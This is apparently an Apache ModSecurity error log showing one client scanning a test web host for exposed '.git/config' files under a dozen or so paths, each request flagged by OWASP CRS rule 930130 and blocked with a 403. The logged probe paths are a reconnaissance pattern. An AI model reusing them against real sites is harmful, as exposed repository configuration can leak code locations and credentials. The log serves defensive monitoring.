[Wed May 22 09:56:52.710343 2024] [:error] [pid 3395359] [client 91.215.85.43:36810] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "Zk2lRJTMfOoR75vS6_DpQAAAAAI"]
[Wed May 22 09:56:52.710772 2024] [:error] [pid 3395359] [client 91.215.85.43:36810] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "Zk2lRJTMfOoR75vS6_DpQAAAAAI"]
[Wed May 22 09:56:52.735632 2024] [:error] [pid 3395395] [client 91.215.85.43:36824] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /aomanalyzer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "Zk2lRAYtOgQFTVNZreu5sQAAAAk"]
[Wed May 22 09:56:52.735963 2024] [:error] [pid 3395358] [client 91.215.85.43:36854] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "Zk2lRMLR5UJ49OezHSs-GQAAAAE"]
[Wed May 22 09:56:52.736141 2024] [:error] [pid 3395395] [client 91.215.85.43:36824] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "Zk2lRAYtOgQFTVNZreu5sQAAAAk"]
[Wed May 22 09:56:52.736606 2024] [:error] [pid 3395358] [client 91.215.85.43:36854] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "Zk2lRMLR5UJ49OezHSs-GQAAAAE"]
[Wed May 22 09:56:52.736994 2024] [:error] [pid 3395358] [client 91.215.85.43:36854] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "Zk2lRMLR5UJ49OezHSs-GQAAAAE"]
[Wed May 22 09:56:52.738374 2024] [:error] [pid 3395395] [client 91.215.85.43:36824] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "Zk2lRAYtOgQFTVNZreu5sQAAAAk"]
[Wed May 22 09:56:52.739396 2024] [:error] [pid 3395396] [client 91.215.85.43:36840] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "Zk2lROdio4tMHzszuH-1WwAAAAo"]
[Wed May 22 09:56:52.739928 2024] [:error] [pid 3395396] [client 91.215.85.43:36840] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "Zk2lROdio4tMHzszuH-1WwAAAAo"]
[Wed May 22 09:56:52.740347 2024] [:error] [pid 3395396] [client 91.215.85.43:36840] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "Zk2lROdio4tMHzszuH-1WwAAAAo"]
[Wed May 22 09:56:52.749981 2024] [:error] [pid 3395392] [client 91.215.85.43:36858] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "Zk2lRIxthpOCBUxc2u8ZzAAAAAY"]
[Wed May 22 09:56:52.750244 2024] [:error] [pid 3395392] [client 91.215.85.43:36858] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "Zk2lRIxthpOCBUxc2u8ZzAAAAAY"]
[Wed May 22 09:56:52.750455 2024] [:error] [pid 3395392] [client 91.215.85.43:36858] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "Zk2lRIxthpOCBUxc2u8ZzAAAAAY"]
[Wed May 22 09:56:52.798164 2024] [:error] [pid 3395393] [client 91.215.85.43:36866] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "Zk2lRJnsJP7yDq0rGFtwQgAAAAc"]
[Wed May 22 09:56:52.798672 2024] [:error] [pid 3395393] [client 91.215.85.43:36866] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "Zk2lRJnsJP7yDq0rGFtwQgAAAAc"]
[Wed May 22 09:56:52.799116 2024] [:error] [pid 3395393] [client 91.215.85.43:36866] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "Zk2lRJnsJP7yDq0rGFtwQgAAAAc"]
[Wed May 22 09:56:52.808943 2024] [:error] [pid 3395384] [client 91.215.85.43:36894] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "Zk2lRGo8EkGRap188Sa_KgAAAAU"]
[Wed May 22 09:56:52.809477 2024] [:error] [pid 3395384] [client 91.215.85.43:36894] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "Zk2lRGo8EkGRap188Sa_KgAAAAU"]
[Wed May 22 09:56:52.810087 2024] [:error] [pid 3395384] [client 91.215.85.43:36894] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "Zk2lRGo8EkGRap188Sa_KgAAAAU"]
[Wed May 22 09:56:52.812077 2024] [:error] [pid 3395360] [client 91.215.85.43:36878] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "Zk2lRFQmnWT4N4NxlYdmHgAAAAM"]
[Wed May 22 09:56:52.812562 2024] [:error] [pid 3395360] [client 91.215.85.43:36878] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "Zk2lRFQmnWT4N4NxlYdmHgAAAAM"]
[Wed May 22 09:56:52.812897 2024] [:error] [pid 3395360] [client 91.215.85.43:36878] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "Zk2lRFQmnWT4N4NxlYdmHgAAAAM"]
[Wed May 22 09:56:53.031237 2024] [:error] [pid 3395394] [client 91.215.85.43:36928] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32dwAAAAg"]
[Wed May 22 09:56:53.031831 2024] [:error] [pid 3395394] [client 91.215.85.43:36928] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32dwAAAAg"]
[Wed May 22 09:56:53.032227 2024] [:error] [pid 3395394] [client 91.215.85.43:36928] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32dwAAAAg"]
[Wed May 22 09:56:53.042338 2024] [:error] [pid 3395357] [client 91.215.85.43:36924] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /alpha/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCAAAAAA"]
[Wed May 22 09:56:53.042943 2024] [:error] [pid 3395357] [client 91.215.85.43:36924] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCAAAAAA"]
[Wed May 22 09:56:53.043379 2024] [:error] [pid 3395357] [client 91.215.85.43:36924] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCAAAAAA"]
[Wed May 22 09:56:53.046675 2024] [:error] [pid 3395359] [client 91.215.85.43:36910] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /a/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQQAAAAI"]
[Wed May 22 09:56:53.047030 2024] [:error] [pid 3395359] [client 91.215.85.43:36910] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQQAAAAI"]
[Wed May 22 09:56:53.047278 2024] [:error] [pid 3395359] [client 91.215.85.43:36910] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQQAAAAI"]
[Wed May 22 09:56:53.063448 2024] [:error] [pid 3395395] [client 91.215.85.43:36946] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5sgAAAAk"]
[Wed May 22 09:56:53.064016 2024] [:error] [pid 3395395] [client 91.215.85.43:36946] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5sgAAAAk"]
[Wed May 22 09:56:53.064406 2024] [:error] [pid 3395395] [client 91.215.85.43:36946] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5sgAAAAk"]
[Wed May 22 09:56:53.064846 2024] [:error] [pid 3395358] [client 91.215.85.43:36930] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-GgAAAAE"]
[Wed May 22 09:56:53.065204 2024] [:error] [pid 3395358] [client 91.215.85.43:36930] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-GgAAAAE"]
[Wed May 22 09:56:53.065528 2024] [:error] [pid 3395358] [client 91.215.85.43:36930] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-GgAAAAE"]
[Wed May 22 09:56:53.067236 2024] [:error] [pid 3395396] [client 91.215.85.43:36934] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XAAAAAo"]
